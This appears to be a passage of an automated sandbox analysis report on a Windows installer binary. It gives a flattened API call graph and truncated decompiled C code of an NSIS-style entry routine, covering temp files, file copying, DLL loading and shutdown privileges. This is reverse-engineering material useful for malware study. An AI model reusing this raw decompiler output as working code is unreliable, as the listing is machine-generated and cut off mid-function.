4025c6 5572->5575 5576 402c15 17 API calls 5573->5576 5578 402c37 17 API calls 5574->5578 5577 402c37 17 API calls 5575->5577 5582 4025ad 5576->5582 5579 4025cd WideCharToMultiByte lstrlenA 5577->5579 5580 4025fc lstrlenW 5578->5580 5579->5582 5580->5582 5581 402629 5583 405df0 WriteFile 5581->5583 5584 40263f 5581->5584 5582->5581 5582->5584 5585 405e1f 5 API calls 5582->5585 5583->5584 5585->5581 5593 10001058 5595 10001074 5593->5595 5594 100010dd 5595->5594 5596 10001092 5595->5596 5597 10001516 GlobalFree 5595->5597 5598 10001516 GlobalFree 5596->5598 5597->5596 5599 100010a2 5598->5599 5600 100010b2 5599->5600 5601 100010a9 GlobalSize 5599->5601 5602 100010b6 GlobalAlloc 5600->5602 5604 100010c7 5600->5604 5601->5600 5603 1000153d 3 API calls 5602->5603 5603->5604 5605 100010d2 GlobalFree 5604->5605 5605->5594 5606 403918 5607 403923 5606->5607 5608 403927 5607->5608 5609 40392a GlobalAlloc 5607->5609 5609->5608 5610 401c19 5611 402c15 17 API calls 5610->5611 5612 401c20 5611->5612 5613 402c15 17 API calls 5612->5613 5614 401c2d 5613->5614 5615 401c42 5614->5615 5616 402c37 17 API calls 5614->5616 5617 401c52 5615->5617 5618 402c37 17 API calls 5615->5618 5616->5615 5619 401ca9 5617->5619 5620 401c5d 5617->5620 5618->5617 5622 402c37 17 API calls 5619->5622 5621 402c15 17 API calls 5620->5621 5623 401c62 5621->5623 5624 401cae 5622->5624 5625 402c15 17 API calls 5623->5625 5626 402c37 17 API calls 5624->5626 5627 401c6e 5625->5627 5628 401cb7 FindWindowExW 5626->5628 5629 401c99 SendMessageW 5627->5629 5630 401c7b SendMessageTimeoutW 5627->5630 5631 401cd9 5628->5631 5629->5631 5630->5631 5632 402a9a SendMessageW 5633 402ab4 InvalidateRect 5632->5633 5634 402abf 5632->5634 5633->5634 5635 40281b 5636 402821 5635->5636 5637 402829 FindClose 5636->5637 5638 402abf 5636->5638 5637->5638 5639 40149e 5640 4022f1 5639->5640 5641 4014ac PostQuitMessage 5639->5641 5641->5640 5642 100010e1 5651 10001111 5642->5651 5643 100011d8 GlobalFree 5644 100012ba 2 API calls 5644->5651 5645 100011d3 5645->5643 5646 10001272 2 API calls 5649 100011c4 GlobalFree 5646->5649 5647 10001164 GlobalAlloc 5647->5651 5648 100011f8 GlobalFree 5648->5651 5649->5651 5650 100012e1 lstrcpyW 5650->5651 5651->5643 5651->5644 5651->5645 5651->5646 5651->5647 5651->5648 5651->5649 5651->5650 5652 406ca2 5656 4067da 5652->5656 5653 407145 5654 406864 GlobalAlloc 5654->5653 5654->5656 5655 40685b GlobalFree 5655->5654 5656->5653 5656->5654 5656->5655 5656->5656 5657 4068d2 GlobalFree 5656->5657 5658 4068db GlobalAlloc 5656->5658 5657->5658 5658->5653 5658->5656 5659 4029a2 5660 402c15 17 API calls 5659->5660 5661 4029a8 5660->5661 5662 4029e8 5661->5662 5663 4029cf 5661->5663 5664 402885 5661->5664 5666 402a02 5662->5666 5667 4029f2 5662->5667 5665 4029d4 5663->5665 5672 4029e5 5663->5672 5673 40624c lstrcpynW 5665->5673 5668 40626e 17 API calls 5666->5668 5669 402c15 17 API calls 5667->5669 5668->5672 5669->5672 5672->5664 5674 406193 wsprintfW 5672->5674 5673->5664 5674->5664 4364 4015a3 4365 402c37 17 API calls 4364->4365 4366 4015aa SetFileAttributesW 4365->4366 4367 4015bc 4366->4367 5675 405224 5676 405234 5675->5676 5677 405248 5675->5677 5679 405291 5676->5679 5680 40523a 5676->5680 5678 405250 IsWindowVisible 5677->5678 5686 405267 5677->5686 5678->5679 5681 40525d 5678->5681 5682 405296 CallWindowProcW 5679->5682 5683 40422d SendMessageW 5680->5683 5688 404b7a SendMessageW 5681->5688 5685 405244 5682->5685 5683->5685 5686->5682 5693 404bfa 5686->5693 5689 404bd9 SendMessageW 5688->5689 5690 404b9d GetMessagePos ScreenToClient SendMessageW 5688->5690 5691 404bd1 5689->5691 5690->5691 5692 404bd6 5690->5692 5691->5686 5692->5689 5702 40624c lstrcpynW 5693->5702 5695 404c0d 5703 406193 wsprintfW 5695->5703 5697 404c17 5698 40140b 2 API calls 5697->5698 5699 404c20 5698->5699 5704 40624c lstrcpynW 5699->5704 5701 404c27 5701->5679 5702->5695 5703->5697 5704->5701 5705 4028a7 5706 402c37 17 API calls 5705->5706 5707 4028b5 5706->5707 5708 4028cb 5707->5708 5709 402c37 17 API calls 5707->5709 5710 405d19 2 API calls 5708->5710 5709->5708 5711 4028d1 5710->5711 5733 405d3e GetFileAttributesW CreateFileW 5711->5733 5713 4028de 5714 402981 5713->5714 5715 4028ea GlobalAlloc 5713->5715 5718 402989 DeleteFileW 5714->5718 5719 40299c 5714->5719 5716 402903 5715->5716 5717 402978 CloseHandle 5715->5717 5734 4032f5 SetFilePointer 5716->5734 5717->5714 5718->5719 5721 402909 5722 4032df ReadFile 5721->5722 5723 402912 GlobalAlloc 5722->5723 5724 402922 5723->5724 5725 402956 5723->5725 5726 4030fa 35 API calls 5724->5726 5727 405df0 WriteFile 5725->5727 5732 40292f 5726->5732 5728 402962 GlobalFree 5727->5728 5729 4030fa 35 API calls 5728->5729 5730 402975 5729->5730 5730->5717 5731 40294d GlobalFree 5731->5725 5732->5731 5733->5713 5734->5721 4550 40202c 4551 40203e 4550->4551 4552 4020f0 4550->4552 4553 402c37 17 API calls 4551->4553 4554 401423 24 API calls 4552->4554 4555 402045 4553->4555 4560 40224a 4554->4560 4556 402c37 17 API calls 4555->4556 4557 40204e 4556->4557 4558 402064 LoadLibraryExW 4557->4558 4559 402056 GetModuleHandleW 4557->4559 4558->4552 4561 402075 4558->4561 4559->4558 4559->4561 4573 406695 WideCharToMultiByte 4561->4573 4564 402086 4566 4020a5 4564->4566 4567 40208e 4564->4567 4565 4020bf 4568 4052b0 24 API calls 4565->4568 4576 10001759 4566->4576 4569 401423 24 API calls 4567->4569 4570 402096 4568->4570 4569->4570 4570->4560 4571 4020e2 FreeLibrary 4570->4571 4571->4560 4574 402080 4573->4574 4575 4066bf GetProcAddress 4573->4575 4574->4564 4574->4565 4575->4574 4577 10001789 4576->4577 4618 10001b18 4577->4618 4579 10001790 4580 100018a6 4579->4580 4581 100017a1 4579->4581 4582 100017a8 4579->4582 4580->4570 4662 10002286 4581->4662 4648 100022d0 4582->4648 4587 1000180c 4593 10001812 4587->4593 4594 1000184e 4587->4594 4588 100017ee 4675 100024a4 4588->4675 4589 100017d7 4603 100017cd 4589->4603 4672 10002b57 4589->4672 4590 100017be 4592 100017c4 4590->4592 4597 100017cf 4590->4597 4592->4603 4658 1000289c 4592->4658 4599 100015b4 3 API calls 4593->4599 4595 100024a4 10 API calls 4594->4595 4601 10001840 4595->4601 4596 100017f4 4686 100015b4 4596->4686 4666 10002640 4597->4666 4605 10001828 4599->4605 4609 10001895 4601->4609 4697 10002467 4601->4697 4603->4587 4603->4588 4608 100024a4 10 API calls 4605->4608 4607 100017d5 4607->4603 4608->4601 4609->4580 4613 1000189f GlobalFree 4609->4613 4613->4580 4615 10001881 4615->4609 4701 1000153d wsprintfW 4615->4701 4616 1000187a FreeLibrary 4616->4615 4704 1000121b GlobalAlloc 4618->4704 4620 10001b3c 4705 1000121b GlobalAlloc 4620->4705 4622 10001d7a GlobalFree GlobalFree GlobalFree 4624 10001d97 4622->4624 4633 10001de1 4622->4633 4623 10001b47 4623->4622 4627 10001c1d GlobalAlloc 4623->4627 4629 10001c86 GlobalFree 4623->4629 4632 10001c68 lstrcpyW 4623->4632 4623->4633 4635 10001c72 lstrcpyW 4623->4635 4636 10002048 4623->4636 4643 10001cc4 4623->4643 4644 10001f37 GlobalFree 4623->4644 4647 1000122c 2 API calls 4623->4647 4711 1000121b GlobalAlloc 4623->4711 4625 10001dac 4624->4625 4626 100020ee 4624->4626 4624->4633 4625->4633 4708 1000122c 4625->4708 4628 10002110 GetModuleHandleW 4626->4628 4626->4633 4627->4623 4630 10002121 LoadLibraryW 4628->4630 4631 10002136 4628->4631 4629->4623 4630->4631 4630->4633 4712 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte 4631->4712 4632->4635 4633->4579 4635->4623 4636->4633 4642 10002090 lstrcpyW 4636->4642 4637 10002195 lstrlenW 4640 100015ff 4 API calls 4637->4640 4645 100021af 4640->4645 4641 10002148 4641->4633 4641->4637 4642->4633 4643->4623 4706 1000158f GlobalSize GlobalAlloc 4643->4706 4644->4623 4645->4633 4647->4623 4650 100022e8 4648->4650 4649 1000122c GlobalAlloc lstrcpynW 4649->4650 4650->4649 4652 10002410 GlobalFree 4650->4652 4653 100023ba GlobalAlloc CLSIDFromString 4650->4653 4654 1000238f GlobalAlloc 4650->4654 4656 100023b8 4650->4656 4715 100012ba 4650->4715 4652->4650 4655 100017ae 4652->4655 4653->4652 4654->4656 4655->4589 4655->4590 4655->4603 4656->4652 4719 100025d4 4656->4719 4660 100028ae 4658->4660 4659 10002953 CreateFileA 4661 10002971 4659->4661 4660->4659 4661->4603 4663 10002296 4662->4663 4664 100017a7 4662->4664 4663->4664 4665 100022a8 GlobalAlloc 4663->4665 4664->4582 4665->4663 4670 1000265c 4666->4670 4667 100026c0 4669 100026c5 GlobalSize 4667->4669 4671 100026cf 4667->4671 4668 100026ad GlobalAlloc 4668->4671 4669->4671 4670->4667 4670->4668 4671->4607 4673 10002b62 4672->4673 4674 10002ba2 GlobalFree 4673->4674 4722 1000121b GlobalAlloc 4675->4722 4677 10002506 MultiByteToWideChar 4683 100024ae 4677->4683 4678 1000252b StringFromGUID2 4678->4683 4679 1000253c lstrcpynW 4679->4683 4680 1000256c GlobalFree 4680->4683 4681 1000254f wsprintfW 4681->4683 4682 100025a7 GlobalFree 4682->4596 4683->4677 4683->4678 4683->4679 4683->4680 4683->4681 4683->4682 4684 10001272 2 API calls 4683->4684 4723 100012e1 4683->4723 4684->4683 4727 1000121b GlobalAlloc 4686->4727 4688 100015ba 4689 100015c7 lstrcpyW 4688->4689 4691 100015e1 4688->4691 4693 100015fb 4689->4693 4692 100015e6 wsprintfW 4691->4692 4691->4693 4692->4693 4694 10001272 4693->4694 4695 100012b5 GlobalFree 4694->4695 4696 1000127b GlobalAlloc lstrcpynW 4694->4696 4695->4601 4696->4695 4698 10001861 4697->4698 4699 10002475 4697->4699 4698->4615 4698->4616 4699->4698 4700 10002491 GlobalFree 4699->4700 4700->4699 4702 10001272 2 API calls 4701->4702 4703 1000155e 4702->4703 4703->4609 4704->4620 4705->4623 4707 100015ad 4706->4707 4707->4643 4714 1000121b GlobalAlloc 4708->4714 4710 1000123b lstrcpynW 4710->4633 4711->4623 4713 1000163f GlobalFree 4712->4713 4713->4641 4714->4710 4716 100012c1 4715->4716 4717 1000122c 2 API calls 4716->4717 4718 100012df 4717->4718 4718->4650 4720 100025e2 VirtualAlloc 4719->4720 4721 10002638 4719->4721 4720->4721 4721->4656 4722->4683 4724 100012ea 4723->4724 4725 1000130c 4723->4725 4724->4725 4726 100012f0 lstrcpyW 4724->4726 4725->4683 4726->4725 4727->4688 5735 404c2c GetDlgItem GetDlgItem 5736 404c7e 7 API calls 5735->5736 5739 404e97 5735->5739 5737 404d21 DeleteObject 5736->5737 5738 404d14 SendMessageW 5736->5738 5740 404d2a 5737->5740 5738->5737 5746 404f7b 5739->5746 5754 404b7a 5 API calls 5739->5754 5766 404f08 5739->5766 5741 404d61 5740->5741 5743 40626e 17 API calls 5740->5743 5744 4041e1 18 API calls 5741->5744 5742 405027 5747 405031 SendMessageW 5742->5747 5753 405039 5742->5753 5748 404d43 SendMessageW SendMessageW 5743->5748 5745 404d75 5744->5745 5749 4041e1 18 API calls 5745->5749 5746->5742 5750 404fd4 SendMessageW 5746->5750 5778 404e8a 5746->5778 5747->5753 5748->5740 5767 404d83 5749->5767 5756 404fe9 SendMessageW 5750->5756 5750->5778 5751 404248 8 API calls 5757 40521d 5751->5757 5752 404f6d SendMessageW 5752->5746 5758 405052 5753->5758 5759 40504b ImageList_Destroy 5753->5759 5763 405062 5753->5763 5754->5766 5755 4051d1 5764 4051e3 ShowWindow GetDlgItem ShowWindow 5755->5764 5755->5778 5762 404ffc 5756->5762 5760 40505b GlobalFree 5758->5760 5758->5763 5759->5758 5760->5763 5761 404e58 GetWindowLongW SetWindowLongW 5765 404e71 5761->5765 5772 40500d SendMessageW 5762->5772 5763->5755 5777 404bfa 4 API calls 5763->5777 5782 40509d 5763->5782 5764->5778 5768 404e77 ShowWindow 5765->5768 5769 404e8f 5765->5769 5766->5746 5766->5752 5767->5761 5771 404dd3 SendMessageW 5767->5771 5773 404e52 5767->5773 5775 404e20 SendMessageW 5767->5775 5776 404e0f SendMessageW 5767->5776 5786 404216 SendMessageW 5768->5786 5787 404216 SendMessageW 5769->5787 5771->5767 5772->5742 5773->5761 5773->5765 5775->5767 5776->5767 5777->5782 5778->5751 5779 4051a7 InvalidateRect 5779->5755 5780 4051bd 5779->5780 5788 404b35 5780->5788 5781 4050cb SendMessageW 5785 4050e1 5781->5785 5782->5781 5782->5785 5784 405155 SendMessageW SendMessageW 5784->5785 5785->5779 5785->5784 5786->5778 5787->5739 5791 404a6c 5788->5791 5790 404b4a 5790->5755 5793 404a85 5791->5793 5792 40626e 17 API calls 5794 404ae9 5792->5794 5793->5792 5795 40626e 17 API calls 5794->5795 5796 404af4 5795->5796 5797 40626e 17 API calls 5796->5797 5798 404b0a lstrlenW wsprintfW SetDlgItemTextW 5797->5798 5798->5790 5799 402a2f 5800 402c15 17 API calls 5799->5800 5801 402a35 5800->5801 5802 402a6c 5801->5802 5804 402885 5801->5804 5805 402a47 5801->5805 5803 40626e 17 API calls 5802->5803 5802->5804 5803->5804 5805->5804 5807 406193 wsprintfW 5805->5807 5807->5804 5808 40432f lstrlenW 5809 404350 WideCharToMultiByte 5808->5809 5810 40434e 5808->5810 5810->5809 5811 401a30 5812 402c37 17 API calls 5811->5812 5813 401a39 ExpandEnvironmentStringsW 5812->5813 5814 401a4d 5813->5814 5816 401a60 5813->5816 5815 401a52 lstrcmpW 5814->5815 5814->5816 5815->5816 5817 4046b0 5818 4046dc 5817->5818 5819 4046ed 5817->5819 5878 405892 GetDlgItemTextW 5818->5878 5821 4046f9 GetDlgItem 5819->5821 5823 404758 5819->5823 5827 40470d 5821->5827 5822 4046e7 5824 4064e0 5 API calls 5822->5824 5828 40626e 17 API calls 5823->5828 5839 40483c 5823->5839 5876 4049eb 5823->5876 5824->5819 5826 404721 SetWindowTextW 5830 4041e1 18 API calls 5826->5830 5827->5826 5832 405bc8 4 API calls 5827->5832 5834 4047cc SHBrowseForFolderW 5828->5834 5829 40486c 5835 405c25 18 API calls 5829->5835 5836 40473d 5830->5836 5831 404248 8 API calls 5837 4049ff 5831->5837 5833 404717 5832->5833 5833->5826 5842 405b1d 3 API calls 5833->5842 5838 4047e4 CoTaskMemFree 5834->5838 5834->5839 5840 404872 5835->5840 5841 4041e1 18 API calls 5836->5841 5843 405b1d 3 API calls 5838->5843 5839->5876 5880 405892 GetDlgItemTextW 5839->5880 5881 40624c lstrcpynW 5840->5881 5844 40474b 5841->5844 5842->5826 5845 4047f1 5843->5845 5879 404216 SendMessageW 5844->5879 5848 404828 SetDlgItemTextW 5845->5848 5853 40626e 17 API calls 5845->5853 5848->5839 5849 404751 5851 406626 5 API calls 5849->5851 5850 404889 5852 406626 5 API calls 5850->5852 5851->5823 5859 404890 5852->5859 5854 404810 lstrcmpiW 5853->5854 5854->5848 5857 404821 lstrcatW 5854->5857 5855 4048d1 5882 40624c lstrcpynW 5855->5882 5857->5848 5858 4048d8 5860 405bc8 4 API calls 5858->5860 5859->5855 5863 405b69 2 API calls 5859->5863 5865 404929 5859->5865 5861 4048de GetDiskFreeSpaceW 5860->5861 5864 404902 MulDiv 5861->5864 5861->5865 5863->5859 5864->5865 5866 40499a 5865->5866 5868 404b35 20 API calls 5865->5868 5867 4049bd 5866->5867 5869 40140b 2 API calls 5866->5869 5883 404203 KiUserCallbackDispatcher 5867->5883 5870 404987 5868->5870 5869->5867 5872 40499c SetDlgItemTextW 5870->5872 5873 40498c 5870->5873 5872->5866 5875 404a6c 20 API calls 5873->5875 5874 4049d9 5874->5876 5877 404609 SendMessageW 5874->5877 5875->5866 5876->5831 5877->5876 5878->5822 5879->5849 5880->5829 5881->5850 5882->5858 5883->5874 5889 401db3 GetDC 5890 402c15 17 API calls 5889->5890 5891 401dc5 GetDeviceCaps MulDiv ReleaseDC 5890->5891 5892 402c15 17 API calls 5891->5892 5893 401df6 5892->5893 5894 40626e 17 API calls 5893->5894 5895 401e33 CreateFontIndirectW 5894->5895 5896 40258c 5895->5896 5897 402835 5898 40283d 5897->5898 5899 402841 FindNextFileW 5898->5899 5900 402853 5898->5900 5899->5900 5901 4029e0 5900->5901 5903 40624c lstrcpynW 5900->5903 5903->5901 5904 401735 5905 402c37 17 API calls 5904->5905 5906 40173c SearchPathW 5905->5906 5907 401757 5906->5907 5909 4029e0 5906->5909 5907->5909 5910 40624c lstrcpynW 5907->5910 5910->5909 5911 10002a77 5912 10002a8f 5911->5912 5913 1000158f 2 API calls 5912->5913 5914 10002aaa 5913->5914 5915 4014b8 5916 4014be 5915->5916 5917 401389 2 API calls 5916->5917 5918 4014c6 5917->5918 4888 40333d SetErrorMode GetVersion 4889 40337c 4888->4889 4890 403382 4888->4890 4891 406626 5 API calls 4889->4891 4892 4065b6 3 API calls 4890->4892 4891->4890 4893 403398 lstrlenA 4892->4893 4893->4890 4894 4033a8 4893->4894 4895 406626 5 API calls 4894->4895 4896 4033af 4895->4896 4897 406626 5 API calls 4896->4897 4898 4033b6 4897->4898 4899 406626 5 API calls 4898->4899 4900 4033c2 #17 OleInitialize SHGetFileInfoW 4899->4900 4979 40624c lstrcpynW 4900->4979 4903 40340e GetCommandLineW 4980 40624c lstrcpynW 4903->4980 4905 403420 GetModuleHandleW 4906 403438 4905->4906 4907 405b4a CharNextW 4906->4907 4908 403447 CharNextW 4907->4908 4909 403571 GetTempPathW 4908->4909 4911 403460 4908->4911 4981 40330c 4909->4981 4911->4911 4916 405b4a CharNextW 4911->4916 4923 40355c 4911->4923 4925 40355a 4911->4925 4912 403589 4913 4035e3 DeleteFileW 4912->4913 4914 40358d GetWindowsDirectoryW lstrcatW 4912->4914 4991 402ec1 GetTickCount GetModuleFileNameW 4913->4991 4915 40330c 12 API calls 4914->4915 4918 4035a9 4915->4918 4916->4911 4918->4913 4920 4035ad GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4918->4920 4919 4035f7 4921 4036aa 4919->4921 4926 40369a 4919->4926 4930 405b4a CharNextW 4919->4930 4924 40330c 12 API calls 4920->4924 5078 403880 4921->5078 5075 40624c lstrcpynW 4923->5075 4928 4035db 4924->4928 4925->4909 5019 40395a 4926->5019 4928->4913 4928->4921 4943 403616 4930->4943 4932 4037e4 4935 403868 ExitProcess 4932->4935 4936 4037ec GetCurrentProcess OpenProcessToken 4932->4936 4933 4036c4 4934 4058ae MessageBoxIndirectW 4933->4934 4938 4036d2 ExitProcess 4934->4938 4941 403804 LookupPrivilegeValueW AdjustTokenPrivileges 4936->4941 4942 403838 4936->4942 4939 403674 4944 405c25 18 API calls 4939->4944 4940 4036da 4945 405819 5 API calls 4940->4945 4941->4942 4946 406626 5 API calls 4942->4946 4943->4939 4943->4940 4947 403680 4944->4947 4948 4036df lstrcatW 4945->4948 4949 40383f 4946->4949 4947->4921 5076 40624c lstrcpynW 4947->5076 4950 4036f0 lstrcatW 4948->4950 4951 4036fb lstrcatW lstrcmpiW 4948->4951 4952 403854 ExitWindowsEx 4949->4952 4953 403861 4949->4953 4950->4951 4951->4921 4955 403717 4951->4955 4952->4935 4952->4953 4956 40140b 2 API calls 4953->4956 4958 403723 4955->4958 4959 40371c 4955->4959 4956->4935 4957 40368f 5077 40624c lstrcpynW 4957->5077 4960 4057fc 2 API calls 4958->4960 4962 40577f 4 API calls 4959->4962 4963 403728 SetCurrentDirectoryW 4960->4963 4964 403721 4962->4964 4965 403743 4963->4965 4966 403738 4963->4966 4964->4963 5086 40624c lstrcpynW 4965->5086 5085 40624c lstrcpynW 4966->5085 4969 40626e 17 API calls 4970 403782 DeleteFileW 4969->4970 4971 40378f CopyFileW 4970->4971 4976 403751 4970->4976 4971->4976 4972 4037d8 4973 406012 36 API calls 4972->4973 4973->4921 4974 406012 36 API calls 4974->4976 4975 40626e 17 API calls 4975->4976 4976->4969 4976->4972 4976->4974 4976->4975 4977 405831 2 API calls 4976->4977 4978 4037c3 CloseHandle 4976->4978 4977->4976 4978->4976 4979->4903 4980->4905 4982 4064e0 5 API calls 4981->4982 4984 403318 4982->4984 4983 403322 4983->4912 4984->4983 4985 405b1d 3 API calls 4984->4985 4986 40332a 4985->4986 4987 4057fc 2 API calls 4986->4987 4988 403330 4987->4988 4989 405d6d 2 API calls 4988->4989 4990 40333b 4989->4990 4990->4912 5087 405d3e GetFileAttributesW CreateFileW 4991->5087 4993 402f01 5018 402f11 4993->5018 5088 40624c lstrcpynW 4993->5088 4995 402f27 4996 405b69 2 API calls 4995->4996 4997 402f2d 4996->4997 5089 40624c lstrcpynW 4997->5089 4999 402f38 GetFileSize 5000 403034 4999->5000 5017 402f4f 4999->5017 5090 402e5d 5000->5090 5002 40303d 5004 40306d GlobalAlloc 5002->5004 5002->5018 5102 4032f5 SetFilePointer 5002->5102 5003 4032df ReadFile 5003->5017 5101 4032f5 SetFilePointer 5004->5101 5006 4030a0 5009 402e5d 6 API calls 5006->5009 5008 403088 5011 4030fa 35 API calls 5008->5011 5009->5018 5010 403056 5012 4032df ReadFile 5010->5012 5015 403094 5011->5015 5013 403061 5012->5013 5013->5004 5013->5018 5014 402e5d 6 API calls 5014->5017 5015->5015 5016 4030d1 SetFilePointer 5015->5016 5015->5018 5016->5018 5017->5000 5017->5003 5017->5006 5017->5014 5017->5018 5018->4919 5020 406626 5 API calls 5019->5020 5021 40396e 5020->5021 5022 403974 5021->5022 5023 403986 5021->5023 5111 406193 wsprintfW 5022->5111 5024 40611a 3 API calls 5023->5024 5025 4039b6 5024->5025 5027 4039d5 lstrcatW 5025->5027 5029 40611a 3 API calls 5025->5029 5028 403984 5027->5028 5103 403c30 5028->5103 5029->5027 5032 405c25 18 API calls 5033 403a07 5032->5033 5034 403a9b 5033->5034 5036 40611a 3 API calls 5033->5036 5035 405c25 18 API calls 5034->5035 5037 403aa1 5035->5037 5038 403a39 5036->5038 5039 403ab1 LoadImageW 5037->5039 5040 40626e 17 API calls 5037->5040 5038->5034 5043 403a5a lstrlenW 5038->5043 5047 405b4a CharNextW 5038->5047 5041 403b57 5039->5041 5042 403ad8 RegisterClassW 5039->5042 5040->5039 5046 40140b 2 API calls 5041->5046 5044 403b61 5042->5044 5045 403b0e SystemParametersInfoW CreateWindowExW 5042->5045 5048 403a68 lstrcmpiW 5043->5048 5049 403a8e 5043->5049 5044->4921 5045->5041 5050 403b5d 5046->5050 5051 403a57 5047->5051 5048->5049 5052 403a78 GetFileAttributesW 5048->5052 5053 405b1d 3 API calls 5049->5053 5050->5044 5055 403c30 18 API calls 5050->5055 5051->5043 5054 403a84 5052->5054 5056 403a94 5053->5056 5054->5049 5057 405b69 2 API calls 5054->5057 5058 403b6e 5055->5058 5112 40624c lstrcpynW 5056->5112 5057->5049 5060 403b7a ShowWindow 5058->5060 5061 403bfd 5058->5061 5062 4065b6 3 API calls 5060->5062 5063 405383 5 API calls 5061->5063 5064 403b92 5062->5064 5065 403c03 5063->5065 5066 403ba0 GetClassInfoW 5064->5066 5069 4065b6 3 API calls 5064->5069 5067 403c07 5065->5067 5068 403c1f 5065->5068 5071 403bb4 GetClassInfoW RegisterClassW 5066->5071 5072 403bca DialogBoxParamW 5066->5072 5067->5044 5073 40140b 2 API calls 5067->5073 5070 40140b 2 API calls 5068->5070 5069->5066 5070->5044 5071->5072 5074 40140b 2 API calls 5072->5074 5073->5044 5074->5044 5075->4925 5076->4957 5077->4926 5079 403898 5078->5079 5080 40388a CloseHandle 5078->5080 5114 4038c5 5079->5114 5080->5079 5083 40595a 67 API calls 5084 4036b3 OleUninitialize 5083->5084 5084->4932 5084->4933 5085->4965 5086->4976 5087->4993 5088->4995 5089->4999 5091 402e66 5090->5091 5092 402e7e 5090->5092 5093 402e76 5091->5093 5094 402e6f DestroyWindow 5091->5094 5095 402e86 5092->5095 5096 402e8e GetTickCount 5092->5096 5093->5002 5094->5093 5097 406662 2 API calls 5095->5097 5098 402e9c CreateDialogParamW ShowWindow 5096->5098 5099 402ebf 5096->5099 5100 402e8c 5097->5100 5098->5099 5099->5002 5100->5002 5101->5008 5102->5010 5104 403c44 5103->5104 5113 406193 wsprintfW 5104->5113 5106 403cb5 5107 403ce9 18 API calls 5106->5107 5109 403cba 5107->5109 5108 4039e5 5108->5032 5109->5108 5110 40626e 17 API calls 5109->5110 5110->5109 5111->5028 5112->5034 5113->5106 5115 4038d3 5114->5115 5116 4038d8 FreeLibrary GlobalFree 5115->5116 5117 40389d 5115->5117 5116->5116 5116->5117 5117->5083

                                                        Executed Functions

                                                        Function 0040333D Relevance: 86.2, APIs: 33, Strings: 16, Instructions: 412stringfilecomCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 40333d-40337a SetErrorMode GetVersion 1 40337c-403384 call 406626 0->1 2 40338d 0->2 1->2 8 403386 1->8 4 403392-4033a6 call 4065b6 lstrlenA 2->4 9 4033a8-4033c4 call 406626 * 3 4->9 8->2 16 4033d5-403436 #17 OleInitialize SHGetFileInfoW call 40624c GetCommandLineW call 40624c GetModuleHandleW 9->16 17 4033c6-4033cc 9->17 24 403440-40345a call 405b4a CharNextW 16->24 25 403438-40343f 16->25 17->16 22 4033ce 17->22 22->16 28 403460-403466 24->28 29 403571-40358b GetTempPathW call 40330c 24->29 25->24 31 403468-40346d 28->31 32 40346f-403473 28->32 36 4035e3-4035fd DeleteFileW call 402ec1 29->36 37 40358d-4035ab GetWindowsDirectoryW lstrcatW call 40330c 29->37 31->31 31->32 34 403475-403479 32->34 35 40347a-40347e 32->35 34->35 38 403484-40348a 35->38 39 40353d-40354a call 405b4a 35->39 57 403603-403609 36->57 58 4036ae-4036be call 403880 OleUninitialize 36->58 37->36 54 4035ad-4035dd GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40330c 37->54 43 4034a5-4034de 38->43 44 40348c-403494 38->44 55 40354c-40354d 39->55 56 40354e-403554 39->56 45 4034e0-4034e5 43->45 46 4034fb-403535 43->46 50 403496-403499 44->50 51 40349b 44->51 45->46 52 4034e7-4034ef 45->52 46->39 53 403537-40353b 46->53 50->43 50->51 51->43 60 4034f1-4034f4 52->60 61 4034f6 52->61 53->39 62 40355c-40356a call 40624c 53->62 54->36 54->58 55->56 56->28 64 40355a 56->64 65 40369e-4036a5 call 40395a 57->65 66 40360f-40361a call 405b4a 57->66 73 4037e4-4037ea 58->73 74 4036c4-4036d4 call 4058ae ExitProcess 58->74 60->46 60->61 61->46 69 40356f 62->69 64->69 76 4036aa 65->76 80 403668-403672 66->80 81 40361c-403651 66->81 69->29 78 403868-403870 73->78 79 4037ec-403802 GetCurrentProcess OpenProcessToken 73->79 76->58 83 403872 78->83 84 403876-40387a ExitProcess 78->84 88 403804-403832 LookupPrivilegeValueW AdjustTokenPrivileges 79->88 89 403838-403846 call 406626 79->89 86 403674-403682 call 405c25 80->86 87 4036da-4036ee call 405819 lstrcatW 80->87 82 403653-403657 81->82 90 403660-403664 82->90 91 403659-40365e 82->91 83->84 86->58 99 403684-40369a call 40624c * 2 86->99 100 4036f0-4036f6 lstrcatW 87->100 101 4036fb-403715 lstrcatW lstrcmpiW 87->101 88->89 102 403854-40385f ExitWindowsEx 89->102 103 403848-403852 89->103 90->82 95 403666 90->95 91->90 91->95 95->80 99->65 100->101 101->58 106 403717-40371a 101->106 102->78 104 403861-403863 call 40140b 102->104 103->102 103->104 104->78 109 403723 call 4057fc 106->109 110 40371c-403721 call 40577f 106->110 115 403728-403736 SetCurrentDirectoryW 109->115 110->115 118 403743-40376c call 40624c 115->118 119 403738-40373e call 40624c 115->119 123 403771-40378d call 40626e DeleteFileW 118->123 119->118 126 4037ce-4037d6 123->126 127 40378f-40379f CopyFileW 123->127 126->123 128 4037d8-4037df call 406012 126->128 127->126 129 4037a1-4037c1 call 406012 call 40626e call 405831 127->129 128->58 129->126 138 4037c3-4037ca CloseHandle 129->138 138->126
                                                        C-Code - Quality: 81%
                                                        			_entry_() {
				signed int _t51;
				intOrPtr* _t56;
				WCHAR* _t60;
				char* _t63;
				void* _t66;
				void* _t68;
				int _t70;
				int _t72;
				int _t75;
				intOrPtr* _t76;
				int _t77;
				int _t79;
				void* _t103;
				signed int _t120;
				void* _t123;
				void* _t128;
				intOrPtr _t147;
				intOrPtr _t148;
				intOrPtr* _t149;
				int _t151;
				void* _t154;
				int _t155;
				signed int _t159;
				signed int _t164;
				signed int _t169;
				void* _t171;
				WCHAR* _t172;
				signed int _t175;
				signed int _t178;
				CHAR* _t179;
				void* _t182;
				int* _t184;
				void* _t192;
				char* _t193;
				void* _t196;
				void* _t197;
				void* _t243;

				_t171 = 0x20;
				_t151 = 0;
				 *(_t197 + 0x14) = 0;
				 *(_t197 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t197 + 0x1c) = 0;
				SetErrorMode(0x8001); // executed
				_t51 = GetVersion() & 0xbfffffff;
				 *0x42a20c = _t51;
				if(_t51 != 6) {
					_t149 = E00406626(0);
					if(_t149 != 0) {
						 *_t149(0xc00);
					}
				}
				_t179 = "UXTHEME";
				goto L4;
				L8:
